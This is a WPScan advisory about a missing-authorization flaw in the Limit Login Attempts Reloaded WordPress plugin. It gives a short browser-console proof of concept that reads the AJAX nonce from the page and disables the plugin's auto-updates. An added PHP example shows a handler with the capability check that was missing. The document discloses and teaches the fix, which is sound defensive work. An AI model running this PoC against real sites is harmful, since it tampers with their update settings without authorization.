wpvulndb | Alex Sanford | WPVDB-ID: 654BAD15-1C88-446A-B28B-5A412CC0399D
History: Nov 06, 2023 - 12:00 a.m.

Limit Login Attempts Reloaded < 2.25.26 - Admin+ Missing Authorization to Toggle Plugin Auto-Update

Published: 2023-11-06 00:00:00 | Author: Alex Sanford | Source: wpscan.com
Tags: wordpress, plugin, security, authorization, ajax, vulnerability

AI Score: 4.9 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 14.1%)

Description

The plugin is missing authorization on the toggle_auto_update AJAX action, allowing any user with a valid nonce to toggle the auto-update status of the plugin.

PoC

As an Admin, open the Limit Login Attempts page in WP Admin and run the following code in the browser console:

    // Read the plugin's AJAX nonce out of the admin page source
    nonce = document.documentElement.innerHTML.match( /sec: '(\w+)'/ )[1];
    // Call the toggle_auto_update action with value=no
    await (await fetch("/wp-admin/admin-ajax.php", {
        "headers": { "content-type": "application/x-www-form-urlencoded; charset=UTF-8" },
        "body": "action=toggle_auto_update&value=no&sec=" + nonce,
        "method": "POST",
        "mode": "cors",
        "credentials": "include"
    })).text();

Check and see that auto-updates have been disabled for the Limit Login Attempts plugin.
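The root cause is that a nonce only proves the request originated from a page the user loaded; it says nothing about whether that user is permitted to perform the action. The following is an added example of a hardened WordPress AJAX handler for this kind of toggle, not the plugin's own code; the hook name, nonce action, option name and request field names are assumptions.

```php
<?php
// Added example (not Limit Login Attempts code). Hook, nonce action, option and
// field names ('value', 'sec') are assumed for illustration.
//
// Weak pattern described in the advisory: check_ajax_referer() alone, then
// update the option. That only defends against CSRF; any logged-in user who can
// obtain the nonce passes it, because there is no capability check.

add_action( 'wp_ajax_example_toggle_auto_update', 'example_toggle_auto_update' );

function example_toggle_auto_update() {
    // 1. CSRF: the request must carry a nonce minted for this action.
    //    check_ajax_referer() dies with a 403-style response on failure.
    check_ajax_referer( 'example_toggle_auto_update', 'sec' );

    // 2. Authorization: the missing step. Only users allowed to manage plugin
    //    updates may change the auto-update setting. wp_send_json_error() ends
    //    the request, so no return is needed after it.
    if ( ! current_user_can( 'update_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Input validation: accept exactly the two allowed states.
    $value = isset( $_POST['value'] )
        ? sanitize_text_field( wp_unslash( $_POST['value'] ) )
        : '';
    if ( ! in_array( $value, array( 'yes', 'no' ), true ) ) {
        wp_send_json_error( array( 'message' => 'Invalid value.' ), 400 );
    }

    // 4. Only now apply the change.
    update_option( 'example_auto_update', $value );
    wp_send_json_success( array( 'value' => $value ) );
}
```

The same ordering (nonce, then capability, then input validation) applies to every `wp_ajax_*` handler that changes state; a handler that stops after the nonce check has the defect this advisory describes.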

CPE Name    Operator    Version
(none)      eq          2.25.26
